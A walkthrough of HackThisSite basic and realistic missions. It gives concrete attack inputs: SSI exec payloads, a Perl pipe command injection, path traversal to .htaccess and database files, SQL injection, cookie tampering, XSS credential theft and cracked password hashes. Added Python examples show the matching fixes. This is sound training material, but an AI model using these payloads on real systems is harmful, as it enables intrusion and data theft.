As usual, the first three levels are skipped, because they are very simple.
1. Click the 'Send password to Sam' button. We will see a message like this: Password reminder successfully sent.
2. On the level 4 home page, press F12 to view the source code and see how the password is sent to Sam. We find this: <input type="hidden" name="to" value="webmaster@hulla-balloo.com">. So just change the email address to your own, click the button to send the password, and the password appears on the web page. Done.
Summary: In this training, you should know how to view the source of a web page.
1. Enter something in the text box, such as abc123; the result is ace468. So a->a, b->c, c->e, ...: each character is shifted by its position, 0, 1, 2, ...
2. Decrypt 74ceggki by reversing that shift. Done.
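The shift observed above (abc123 -> ace468, each character moved forward by its position) implemented both ways, as an added Python example that is not part of the original write-up. It assumes the shift applies to the plain ASCII code of every character, which is what the observed pairs show, and recovers the per-position shifts from a chosen plaintext/ciphertext pair the way the write-up does by hand:

```python
# Added example: position-dependent shift reconstructed from the
# observation abc123 -> ace468 (character i is moved forward by i).
# Assumes plain ASCII arithmetic; this is not code from hackthissite.org.


def encode(text: str) -> str:
    """Shift the i-th character forward by i positions in ASCII."""
    return "".join(chr(ord(ch) + i) for i, ch in enumerate(text))


def decode(cipher: str) -> str:
    """Reverse the shift: move the i-th character back by i positions."""
    return "".join(chr(ord(ch) - i) for i, ch in enumerate(cipher))


def recover_shifts(plain: str, cipher: str) -> list:
    """Derive the per-position shift from a chosen plaintext/ciphertext pair.

    This is the general form of the manual observation "0, 1, 2, ...":
    feed a known input and read the shift off every position.
    """
    if len(plain) != len(cipher):
        raise ValueError("plaintext and ciphertext lengths differ")
    return [ord(c) - ord(p) for p, c in zip(plain, cipher)]


if __name__ == "__main__":
    # The pair from the write-up, then the string it asks us to decrypt.
    print(recover_shifts("abc123", "ace468"))
    print(decode("74ceggki"))
```

recover_shifts is the useful part for other levels: if a later box used a different pattern, the list of per-position differences shows it directly instead of requiring guesswork.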
1. We can see that Sam runs the UNIX cal command and returns its output, so input a command like this:
You will find the password file. Done.
Summary: In this training, you should know something about command injection and UNIX commands.
The problem is how to find the password file by submitting something, and at first there is no clue.
1. Use SSI (server-side includes) to execute the ls command on the server side. The first directory may not be the right one, so use ../ to list the parent directory. Done. In this test we used <!--#exec cmd="ls ../"-->; if the server's OS is Windows, you would use something like <!--#exec cmd="dir"-->.
1. The message says we can get the file from the level 8 test, but viewing the source code turns up nothing. So go back to level 8 and change the injection to <!--#exec cmd="ls ../../9"-->. We get the password file. Done.
1. View the source code, but nothing useful is found.
2. Enter anything and click the submit button; we see a message like this:
You are not authorized to view this page. Since there is no login function at all, how does it validate authorization? Intercept the request and look at the cookie, and you find something interesting.
3. Intercept the submit request, change level10_authorized=no to level10_authorized=yes and submit. Done.
Summary: In this training, you should know something about authorization and cookies.
1. When we open the page, we find nothing but something like this:
I love my music! "Believe " is the best!
This is useless for us. Can we find something useful? Again we view the source code, but this time we are unlucky, because we only find a comment like this:
<!--We even have our own collection - if you could find it!-->
2. It seemed that the only useful things we had were Apache and the word collection. When I opened the page again, I found that the message had changed to:
I love my music! "I Feel Like a Bullet (In the Gun of Robert Ford)" is the best!
So refresh the page, and the message changes again:
I love my music! "Georgia " is the best!
I love my music! "I Need You to Turn To" is the best!
How do we find the so-called collection?
3. Search for these songs in Google to look for clues: they are all by Elton John! Maybe this is the collection. So we try directory listing like /eltonjohn/. Fail again. /johnelton/? Fail again. /john/? /elton/? /j/? /e/?
4. From the message we know that Apache is used. So open this in the browser:
IndexIgnore DaAnswer.* .htaccess
5. Visit the missions/basic/11/e/l/t/o/n/DaAnswer/ directory, and the following information is found:
The answer is not here! Just look a little harder.
6. Enter the password "not here" in missions/basic/index.php. Done!
Message: Hey man, I need a big favour from you. Remember that website I showed you once before? Uncle Arnold's Band Review Page? Well, a long time ago I made a $500 bet with a friend that my band would be at the top of the list by the end of the year. Well, as you already know, two of my band members have died in a horrendous car accident... but this ass hole still insists that the bet is on!
I know you're good with computers and stuff, so I was wondering, is there any way for you to hack this website and make my band on the top of the list? My band is Raging Inferno. Thanks a lot, man!
Solution:
View the source code and tamper with the rating data, setting it to a big number such as 1000.
Message: I have been informed that you have quite admirable hacking skills. Well, this racist hate group is using their website to organize a mass gathering of ignorant racist bastards. We cannot allow such bigoted aggression to happen. If you can gain access to their administrator page and post messages to their main page, we would be eternally grateful.
Solution:
View the source code and find update.php. Open it in the browser and a login page is displayed.
Try SQL injection in the username field: failed. Try it in the password field: done.
Message: I run this website where people can read and submit peace-related poetry. I am doing this out of good will towards others, and I don't see why I would be making enemies out of this, but some real ass hole hacked my website posting a bunch of ignorant aggressive propaganda on the front page. And I made that website a while ago, and I no longer have access to it. Do you think you can hack in and change it back? Please? Oh, and bonus points if you message me the name of the bastard who did this!
My website can be found here.
Solution:
View the source code and find this:
<!--Note to the webmaster
This website has been hacked, but not totally destroyed. The old website is still up. I simply copied the old index.html file to oldindex.html and remade this one. Sorry about the inconvenience.-->
So visit oldindex.html to access the old web site. There are two functions: read and submit poetry.
Try using index.html as the poetry name and submitting: failed...
Try ../index.html as the poetry name; the page content is then no longer the old web page. Copy the old page's content into it. Done.
Message: Hello, I was referred to you by a friend who says you know how to hack into computers and web sites - well I was wondering if you could help me out here. There's this local store who is killing hundreds of animals a day exclusively for the purpose of selling jackets and purses etc out of their skin! I have been to their website and they have an email list for their customers. I was wondering if you could somehow hack in and send me every email address on that list? I want to send them a message letting them know of the murder they are wearing. Just reply to this message with a list of the email addresses. Please? Their website is at http://www.hackthissite.org/missions/realistic/4/. Thanks so much!!
Solution:
Enter both a valid and an invalid email and click "add to list"; the table name is then found.
View the source code and find /products.php?category=1, then change the parameter to test for SQL injection.
Use a UNION ALL SQL injection to get the email list.
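Why changing the category parameter works, and what the fix looks like, as an added Python example that is not code from the page or from the mission site. The in-memory SQLite tables, product names and addresses are constructed here; the `1 or 1=1` input is the one the write-up itself uses later. The vulnerable function splices the parameter into the SQL text, so the condition it builds is changed by the input; the safe version converts the parameter to an integer and binds it with a placeholder, so the database only ever sees a value, never extra SQL:

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the store's tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, category INTEGER, name TEXT);
        CREATE TABLE email_list (address TEXT);
        INSERT INTO products (category, name) VALUES
            (1, 'leather jacket'), (1, 'leather purse'), (2, 'wool scarf');
        INSERT INTO email_list VALUES ('alice@example.test'), ('bob@example.test');
    """)
    return conn


def products_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    """String concatenation: the request parameter becomes part of the SQL."""
    sql = "SELECT name FROM products WHERE category = " + category + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def products_safe(conn: sqlite3.Connection, category: str) -> list:
    """Validate the type, then bind the value with a placeholder."""
    try:
        category_id = int(category)
    except ValueError:
        raise ValueError("category must be an integer id")
    rows = conn.execute(
        "SELECT name FROM products WHERE category = ? ORDER BY id", (category_id,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    print(products_vulnerable(db, "1"))          # one category, as intended
    print(products_vulnerable(db, "1 or 1=1"))   # the WHERE clause is now always true
    print(products_safe(db, "1"))
    try:
        products_safe(db, "1 or 1=1")
    except ValueError as err:
        print("rejected:", err)
```

The same concatenation is what lets a UNION-style input read a second table such as the email list: once input can alter the statement, the attacker chooses what the query returns. Parameter binding removes that ability regardless of which table the query touches.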
Message: Yo! This is Spiffomatic64 from Hackthissite.org! I'm a bit of a hacker myself as you can see, but I recently came upon a problem I couldn't resolve.....
Lately I've been getting calls day and night from the telemarketing place. I've gone to their website and hacked it once deleting all of their phone numbers so they wouldn't call me anymore. That was a temporary fix but they put their database back up, this time with an encrypted password. When I hacked them I noticed everything they used was 10 years out of date and the new password seems to be a 'message digest'. I have done some research and I think it could be something like a so-called hash value. I think you could somehow reverse engineer it or brute force it. I also think it would be a good idea to look around the server for anything that may help you.
Solution:
Clue found: Google was grabbing links it shouldn't be so I have taken extra precautions
Then the encrypted password is found, and also a file named "hash".
Open the "hash" file; the "MD4" algorithm is found there.
Message: Hello esteemed hacker, I hope you have some decent cryptography skills. I have some text I need decrypted.
I work for this company called ToxiCo Industrial Chemicals, which has recently come under fire because of the toxic chemicals we are dumping into the river nearby. Ecological inspectors have reported no problems, but it is widely speculated that they were paid off by ToxiCo management because the water pollution near the ToxiCo factory has always been a serious and widely publicized issue.
I have done some packet sniffing on my network and I have recovered this email that was sent from the CEO of the company to Chief Ecological Inspector Samuel Smith. However, it is encrypted and I cannot seem to decode it using any of my basic decryption tools. I have narrowed it down to the algorithm used to encrypt it, but it is beyond my scope. I was hoping you can take a look at it.
More details are on the page. If you can unscramble it and reply to this message with the original text, it would be much appreciated. Thank you.
Solution:
Two sample groups from the ciphertext, with the sum of each group:
.74.40.67 -> 74 + 40 + 67 = 181 = 83 + 49 + 49
.90.96.44 -> 90 + 96 + 44 = 230 = 83 + 49 + 49 + 49
Suppose the original text is x and the encryption key is "key". Each group of three numbers then satisfies:
sum(a+b+c) = ascii(x) + ascii(k) + ascii(e) + ascii(y)
Build List = [sum(a+b+c), sum(a1+b1+c1), ...] over all groups.
The most common value in the List should be the space character (the most frequent character in the text; its ASCII value is 32). So:
ascii(k) + ascii(e) + ascii(y) = (most common sum) - 32
and each plaintext character is recovered as char(List[i] - (ascii(k) + ascii(e) + ascii(y))).
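The derivation above carried out in code, as an added Python example (not code from the page or from hackthissite.org). It uses the page's model of the cipher: every plaintext character becomes three numbers whose sum is ascii(x) plus the sum of the key's character codes. The encrypt function, the sample message and the key "key" are constructed here only to produce input; the solver side (group_sums, recover_key_sum, decrypt) is the page's method: sum each triple, take the most common sum as the space, subtract.

```python
import random
from collections import Counter

# Constructed sample input, not the mission's ciphertext.
SAMPLE_PLAINTEXT = "meet me at the dock at nine pm"
SAMPLE_KEY = "key"          # the page's hypothetical key


def key_sum(key: str) -> int:
    """ascii(k) + ascii(e) + ascii(y) in the page's notation."""
    return sum(ord(ch) for ch in key)


def encrypt(plaintext: str, key: str, seed: int = 1) -> str:
    """Constructed encoder matching the page's model: each character becomes
    .a.b.c with a + b + c = ascii(x) + key_sum. The split is random."""
    rng = random.Random(seed)
    k = key_sum(key)
    groups = []
    for ch in plaintext:
        total = ord(ch) + k
        a = rng.randint(1, total - 2)
        b = rng.randint(1, total - a - 1)
        groups.append(f".{a}.{b}.{total - a - b}")
    return "".join(groups)


def group_sums(ciphertext: str) -> list:
    """Parse '.a.b.c.a1.b1.c1...' and return [a+b+c, a1+b1+c1, ...] (the List)."""
    numbers = [int(tok) for tok in ciphertext.split(".") if tok]
    if len(numbers) % 3:
        raise ValueError("ciphertext is not made of .a.b.c triples")
    return [sum(numbers[i:i + 3]) for i in range(0, len(numbers), 3)]


def recover_key_sum(sums: list, space: int = 32) -> int:
    """Assume the most common sum is the space character (ASCII 32)."""
    most_common, _ = Counter(sums).most_common(1)[0]
    return most_common - space


def decrypt(ciphertext: str) -> str:
    sums = group_sums(ciphertext)
    k = recover_key_sum(sums)
    return "".join(chr(s - k) for s in sums)


if __name__ == "__main__":
    ct = encrypt(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    print(ct)
    print("recovered key sum:", recover_key_sum(group_sums(ct)), "expected:", key_sum(SAMPLE_KEY))
    print(decrypt(ct))
```

The space assumption is the weak point: on a very short message some other character may be the most frequent, in which case recover_key_sum is off by a constant and the output is readable but shifted. Trying the second and third most common sums as the space candidate, and checking which gives printable text, fixes that without any change to the model.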
Message: Friend of freedom and liberty, I invite you to take a look at the hate speech being spewed over the web at http://www.hackthissite.org/missions/realistic/7/. It's so funny that conservatives keep saying they want to protect the values of America - freedom, tolerance, and democracy - but when it comes to personal choices like private marijuana use or same-sex marriages, they damn them to burn in eternal hell and send them to jail.
This is a personal freedom issue. No one else is hurt if two consenting adults decide to marry. But people who claim to have the moral high ground decide to ruin it for everyone else and discriminate against same-sex couples. To think that they are talking about making a constitutional amendment to STOP OUR FREEDOM TO MARRY is ludicrous. This injustice must be stopped.
There is an admin section on that website somewhere, perhaps hidden among their directory structure. It would be a great fight against moral tyranny and a victory for freedom if you could somehow hack into their website. Thank you.
Solution:
View the source code; an images directory is found.
The admin directory needs a user name and password (Apache authentication).
showimages.php?file=patriot.txt
Path traversal: showimages.php?file=images/admin/.htaccess
View the source: AuthUserFile /www/hackthissite.org/www/missions/realistic/7/images/admin/.htpasswd
Got the user name and password hash: administrator:$1$AAODv...$gXPqGkIO3Cu6dnclE/sok1
Recover the password from the hash and log in.
Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:
1. Find the account of Gary Hunter (I don't know his account name).
2. Move the $10,000,000 into the account dropCash.
3. Clear The Logs, They're held in the folder 'logFiles'.
I really hope you can do this, because if you can't we're all screwed
Solution:
Perform SQL injection at search.php.
Log in with your account (register one first). Change the cookie "accountUsername" to GaryWilliamHunter and move the $10,000,000 into the account dropCash.
Change the hidden input "dir" value to logFiles and click the "Clear Files In Personal Folder" button.
Message:
I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:
Username: r-conner@crappysoft.com
Solution:
Log in with r-conner@crappysoft.com / ilovemywork
View the source code at Mail List, and find ./files/mailinglist/addresses.txt and ./files/logs/logs.txt
"strUsername" and "strPassword" are stored in the cookie.
Send a private message to "m-crap" containing XSS (because the username and password are kept in the cookie).
Change the cookie with the information found and pay the salary to r-conner.
On the mailing list page, change the input value of "strFilename" to the path of the log file, enter any characters without @ in the email address input and click the "Subscribe!" button.
Message: hey man, it's me Zach, I need a favour from you, I'm in big trouble.
if you'll remember, I go to that super uptight religious school. well, two of my teachers are failing me because my lifestyle does not fall in line with their moralistic rules for public behaviour. My gym teacher even called me a 'long-haired hippie faggot'! And if I fail any classes, I won't graduate.
Listen, can you hack into the school's grade database and make it so I'm passing all my classes? I know they have this system set up on their website that allows teachers to submit grades and stuff, and I heard you pulled a few things in the past as well. Their web master was not thinking in terms of computer security when he was designing the website, so it might be easy. Or not. Please check it out here. The username to my account is 'Zach Sanchez' and my password is 'liberty638'. Thanks man!
Solution:
Get information: teacherinfo.php?id=1
Login page found: staff.php
Log in with smiller/smiller: Please remember that access to the staff administration area is restricted to the district-supplied 'holy_teacher' web browser.
Change your web browser's user agent to holy_teacher.
Change the 'admin' value from 0 to 1 in the cookie.
View the source code and you will find the way to change grades.
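Basic 10 (level10_authorized=yes), realistic 8 (accountUsername), realistic 9 (strUsername/strPassword) and realistic 10 (admin=0 -> 1) all fail the same way: the server reads an authorization decision straight out of a cookie the client controls. The added Python example below, which is not code from the page or from the mission site, puts the trusting check next to a signed-session check. The secret, cookie names and user names are constructed for the example; the signing uses HMAC-SHA256 from the standard library.

```python
import base64
import hashlib
import hmac
from typing import Optional

# Constructed server-side secret; in a real deployment this comes from
# configuration and never reaches the client.
SECRET = b"constructed-example-secret-do-not-reuse"


def parse_cookie(header: str) -> dict:
    """Split 'a=1; b=2' into a dict (maxsplit=1 keeps '=' inside values)."""
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {k: v for k, v in pairs}


# --- Vulnerable pattern (what the missions do) -------------------------
def is_admin_naive(cookie_header: str) -> bool:
    """Trusts the flag exactly as the browser sent it."""
    return parse_cookie(cookie_header).get("admin") == "1"


# --- Signed session (what the server should do) ------------------------
def sign(payload: str) -> str:
    """Return payload + '.' + HMAC(payload); only the server can produce it."""
    mac = hmac.new(SECRET, payload.encode(), hashlib.sha256).digest()
    return payload + "." + base64.urlsafe_b64encode(mac).decode().rstrip("=")


def verify(token: str) -> Optional[str]:
    """Return the payload if the signature matches, else None."""
    payload, _, _sig = token.rpartition(".")
    if not payload:
        return None
    expected = sign(payload)
    if hmac.compare_digest(expected.encode(), token.encode()):
        return payload
    return None


def is_admin_signed(cookie_header: str) -> bool:
    """Authorization comes from the signed payload, not from a bare cookie."""
    token = parse_cookie(cookie_header).get("session", "")
    payload = verify(token)
    return payload is not None and "admin=1" in payload.split("&")


if __name__ == "__main__":
    print(is_admin_naive("admin=0"), is_admin_naive("admin=1"))   # False True
    token = sign("user=zach&admin=0")
    tampered = token.replace("admin=0", "admin=1")
    print(is_admin_signed("session=" + token))      # False
    print(is_admin_signed("session=" + tampered))   # False: signature no longer matches
```

Editing the payload breaks the MAC, so the realistic 10 trick of flipping admin from 0 to 1 is rejected. A production app would also percent-encode or base64 the payload (raw `=` and `&` inside a cookie value are sloppy), add an expiry, or simply keep the role server-side and hand the browser only an opaque session id.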
Message: Hello, I'm space46 from space46.nod. Up until recently, BudgetServ used to be a good host, but the company got new owners and some lame hosted site was deleted somehow. The administrators think that it was me and they've suspended my account. I've contacted them numerous times about getting my files back but they refuse. As it so happens, I made a backup in my web root named src.tar.gz right before the account was suspended. Can you get this file back so that I can move to a better host?
Solution:
webmail.php login:
Due to the recent security breach, WebMail is currently unavailable.
page.pl?page=email123:
open(file, "pages/email123") failed: No such file or directory
Found this in OWASP -> Command Injection:
When viewing a file in a web application, the file name is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol “|” onto the end of the filename.
So use this URL: page.pl?page=|ls|
admin bs.dbase client_http_docs frontpage.gif index.html letter.gif logo.gif ms.gif mysql.gif order.pl page.pl pages perl.gif php.gif server.gif sqlite.png suspended.html tux.gif webmail.php
client_http_docs dir listing
index.html Directory listing not shown here
suspended.html This account has been suspended.
webmail.php Due to the recent security breach, WebMail is currently unavailable.
Index of /var/www/budgetserv/client_http_docs
potatoworks/ potatoworks is currently under construction your potatoworks team
space46/ This account has been suspended.
therightwayradio/ client_http_docs/therightwayradio/?page=admin&add_mod=4729 Access denied
therightwayradio/logger.html
wonderdiet/ client_http_docs/wonderdiet/order.html Warning: fopen(pins.txt): failed to open stream: No such file or directory in /var/www/budgetserv/html/client_http_docs/wonderdiet/ on line 19. Cannot open file.
/11/client_http_docs/therightwayradio/?page=main: ./?page=main&id=1
When id is changed to 0, there is an "edit account" button.
So change the password and use that account to log in.
/11/client_http_docs/therightwayradio/?page=mod
Use this SQL to get all the tables: SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;
Change the DB to ../../../bs.dbase and query the tables:
web_email web_user web_package web_pass
space46@space46.nod space46 -1 notofthisworld
rsmith@therightwayradio.nod therightwayradio 4 letgodsortitout
admin@wonderdiet.nod wonderdiet 1 suckereveryminute
Use the last two users to log in at /realistic/11/admin/
Download any file and you will see the file path in the URL, so change the URL to download src.tar.gz under the "space46" directory.
Message: Hey it's OutThere from hackthissite.org. I've run into a problem that I can't seem to solve. As you may know, I go to Heartland High School, and our school put everything on the internet a few years ago. This was great at first, but then this really uptight guy, Jason Bardus, got a job as a computer teacher. He set up this overly restrictive web proxy and made it so that school computers could only connect to the district site. He hates people who know more than him, so he blocked all these hacker sites, open source websites, and he even blocked google! He is really paranoid about security, but I don't think he really knows what he is doing. The district site is here, and it runs on some crappy Windows 95 machine, if that helps. Can you clear the list of blocked pages by getting admin access? Please help me out, because information should be for everyone.
Solution:
Interesting things found:
student.html:
<input name="action" value="write" type="hidden">
<input name="text" size="50" type="text">
<input value="submit" type="submit">
12/cgi-bin/guest.pl?action=read&file=guestbook.txt
Found: heartlandadminpanel.pl
12/cgi-bin/guest.pl?action=read&file=heartlandadminpanel.pl
View the source code and find:
password: heartlandnetworkadministrator
Visit: 12/cgi-bin/heartlandadminpanel.pl?username=jbardus&password=heartlandnetworkadministrator
Message: Hey, Josh Haze (a.k.a. Fr0zenB1t) here, I REALLY need some help. As you know, I'm in with the AOE (Anarchists of Elbonia). Our mission is to thwart the upcoming elections, and at least attempt to delay them for the time being. The way we've decided would work best is if one of the main competitor's site is taken down. Even if it is down for a small amount of time, things won't go smoothly for him, and things will be delayed...
BTW: Elbonia Election Site
Solution:
MySQL Error Reported: row "x" does not exist
Error in query: "SELECT post, date FROM newsTable WHERE month ="x"
"xxxyyyzzz@123.com" could not be added to "emails_table"
Please Contact Administrator
The following speeches have been given already:
SPEECH: 1 or 1=1 could not be found
[2] include(C:\Program Files\Apache Group\Apache2\ENRP\oldsite\speches.php): failed to open stream: No such file or directory
Error on line 18 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(): Failed opening 'C:\Program Files\Apache Group\Apache2\ENRP\oldsite\speches.php' for inclusion (include_path='.:/usr/local/share/pear')
Error on line 18 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(C:\Program Files\Apache Group\Apache2\ENRP\21232f297a57a5a743894a0e4a801fc3\speches.php): failed to open stream: No such file or directory
Error on line 24 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(): Failed opening 'C:\Program Files\Apache Group\Apache2\ENRP\21232f297a57a5a743894a0e4a801fc3\speches.php' for inclusion (include_path='.:/usr/local/share/pear')
Error on line 24 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(C:\Program Files\Apache Group\Apache2\ENRP\admin\passes.php): failed to open stream: No such file or directory
Error on line 25 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(): Failed opening 'C:\Program Files\Apache Group\Apache2\ENRP\admin\passes.php' for inclusion (include_path='.:/usr/local/share/pear')
Error on line 25 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
Passes need to be reset: send correct HTTP_REFERER to gain access here
MySQL Error: "1 or 1=1" row does not exist in table "press_table";
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\Apache Group\Apache2\ENRP\readpress.php on line 33
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$in = "GET /speeches/passwords/" . md5('Speeches') . "";
$in .= "REFERER: http://ENRP/get_speeches_passwords_referer\n";
socket_write($socket, $in, strlen($in));
include(\"C:\Program Files\Apache Group\Apache2\htdocs\ENRP\includes\special.php\");
include(\"C:\Program Files\Apache Group\Apache2\htdocs\ENRP\includes\footer.php\");
include(\"C:\Program Files\Apache Group\Apache2\htdocs\ENRP\includes\arrange.php\");
13/oldsite/: Devs, we need to destroy the password "imhomealone" because it's been leaked somehow - Daruman - August 9th
13/admin/passes.php with the referer http://ENRP/get_speeches_passwords_referer: Correct HTTP_HEADEER
13/21232f297a57a5a743894a0e4a801fc3/: login page found
Speeches md5:7e40c181f9221f9c613adf8bb8136ea8
13/speeches/passwords/7e40c181f9221f9c613adf8bb8136ea8/:password.fip:
7bc35830abab8fced52657d38ea048df:21232f297a57a5a743894a0e4a801fc3
moni1 md5:7bc35830abab8fced52657d38ea048df
admin md5:21232f297a57a5a743894a0e4a801fc3
Message: You've probably heard of Yuppers Internet Solutions before. They started in 1997 and are now one of the top websites on the net. I was an intern at Yuppers for a time, but quit when I learned that the admins were selling user data and usage habits to advertisers while saying the opposite. Unfortunately, I couldn't get out of the building with any proof and don't have any high-level access. I do know, however, that much of the coding on their site was done by amateurs and is probably insecure. Can you hack in and get some proof?
Solution:
Sign up: Account creation was a success! You now have an email account, ender012@yuppers.nod, webspace on Y-Webs, and access to Yuppers! People.
(username/password:ender012/zc000111)
/realistic/14/news.cgi?story=news.cgi%00:
/realistic/14/news.cgi?story=search.cgi%00:
/realistic/14/news.cgi?story=.%00:
Log in with isadmin in moderator.cgi
View Account Info with "*"
So you get the admin account; use it to log in at login.html
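Realistic 3 (../index.html as a poem name), realistic 7 (showimages.php?file=images/admin/.htaccess), realistic 11 (../../../bs.dbase) and realistic 14 (news.cgi?story=...%00) are all one server-side mistake: a user-supplied file name is joined onto a base path and opened without checking where it really points, and in the %00 case the appended extension is cut off by a NUL byte. The added Python example below (not code from the page or from the mission site) shows the check such a file viewer needs. The base directory is a temporary directory created here, and the file names are constructed:

```python
import os
import tempfile

# Constructed base directory standing in for e.g. the images/ folder.
BASE_DIR = tempfile.mkdtemp(prefix="images_")
ALLOWED_SUFFIXES = (".txt", ".jpg", ".gif")


def resolve_user_path(base_dir: str, requested: str,
                      allowed_suffixes: tuple = ALLOWED_SUFFIXES) -> str:
    """Return the absolute path for `requested` if it is inside base_dir.

    Rejects NUL bytes (the %00 truncation trick), names that resolve outside
    the base directory via '..' or an absolute path, and unexpected suffixes.
    """
    if "\0" in requested:
        raise ValueError("NUL byte in file name")
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` if `requested` is absolute; realpath then
    # normalises '..' so the containment check below sees the true target.
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the allowed directory")
    if not target.endswith(allowed_suffixes):
        raise ValueError("file type not allowed")
    return target


def check_requests(base_dir: str, names: list) -> dict:
    """Map each requested name to True (accepted) or False (rejected)."""
    result = {}
    for name in names:
        try:
            resolve_user_path(base_dir, name)
            result[name] = True
        except ValueError:
            result[name] = False
    return result


if __name__ == "__main__":
    samples = [
        "patriot.txt",                  # legitimate request
        "../admin/.htaccess",           # parent-directory traversal
        "/etc/passwd",                  # absolute path replaces the base
        "news.cgi\0.txt",               # NUL byte would truncate the suffix
        "sub/../../../bs.dbase",        # traversal hidden behind a subdir
    ]
    for name, ok in check_requests(BASE_DIR, samples).items():
        print(repr(name), "accepted" if ok else "rejected")
```

The containment test is done on the resolved path, not on the string, so encodings, redundant separators and `..` in the middle of a name are all handled by one comparison. Checking the suffix after resolution (rather than appending it to the user's input) is what removes the reason the %00 trick ever worked.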
Message: Hi, please help me if you are against war like me. Rumours are saying that the seculas Ltd. company is developing an awful new laser aided weapon, and that they already have patents pending. Please try to find out what their latest patents are about. People say you know your shit and that you are an amazingly good hacker. It should not be a prob for someone with your skills. What I know is that seculas Ltd. hired a new programmer who is responsible for the server, and he passworded everything and always with different passwords. I heard about him, he is one of the kind who locks the front door twice and leaves the back-door open.
If you think like me please help me and fight those people that make money with war.
Solution:
index.htm:
<meta name="Author" content="webadmin: Susy Slack, email s.slack@seculas.com">
questions.php: storequestion.php
storeapplication.php: _backups_/images/ok.gif, a zip file, found
Note that PKZIP prepends 12 random bytes to the compressed data before encryption, so the ciphertext file has to be 12 bytes longer than the plaintext.
So use a known-plaintext attack to unzip the zip file.
As we see in the source code:
if (ereg($msg_username . ": " . $msg_password . "\r*\n*$", $strLine, $regs))
So if there is some string like xxxadmin:correct_password,
Read message: directory found: admin_area
/realistic/15/admin_area/shell.php
Try these as the user name to log in, and click OK and Cancel:
You will find some information displayed after you click the Cancel button.
Find the hash and crack it:
9e71fc2a99a71b722ead746b776b25ac: foobar
After logging in with root/foobar, files and directories found by the "ls" command:
if (checkit(argv[1], argv[2], argv[3]) == 'Y')
strcpy(concatenated, username);
Message: Hi, I think my girlfriend is cheating on me! But I can't find proof for it. I know she uses SimpleMail, and it's quite new, so you might be able to hack it. Please! I really need to know if she is cheating on me, so I could move on. Chances are, SimpleMail will be VERY secure, but I believe that you could do it!
Just in case you're stuck, I've done some researches about it, and found some interesting comments in the source. Good luck!
Please save a heart, if not a relationship.
Oh yeah, her email is jenn@simplemail.com
Solution:
His girlfriend's mail account: jenn@simplemail.com
index.php:
Sorry everyone, it seems we were having a problem with people registering who tried to use special characters in their name.
index.php?module=admin_login (Keep this hidden for now)
For now, we suggest sticking to just letters and numbers in your email address.
index.php?module=admin_login->login[1].swf:
index.php?module=home*_blank*authed**true
*admin.php?auth=true&id=63a4bf12cd*getURL*admin.php?auth=false*onEnterFrame*auth_page*length*real_auth*?user=*user*text*&pass=*pass*WaitForData2*MENU*ContextMenu*hideBuiltInItems*_root*menu*auth.php*btnLogin*onRelease*config.txt*WaitForData
config.txt:auth_page=auth.php
private message: auth_page=config.txt&authed=true&
Register new user with ".." as the email account and private message: auth_page=config.txt&authed=true&
auth_page=config.txt&authed=true&;
\\These is the user config file notes, anything with \\ in front is ignored
Log in: index.php?module=admin_login
1: ./check_email.php?auth=true&id=63a4bf12cd&email=
function2 CheckEmail($1=email) {
push './check_email.php?auth=true&id=63a4bf12cd&email='
check_email.php?auth=true&id=63a4bf12cd&email=jenn@simplemail.com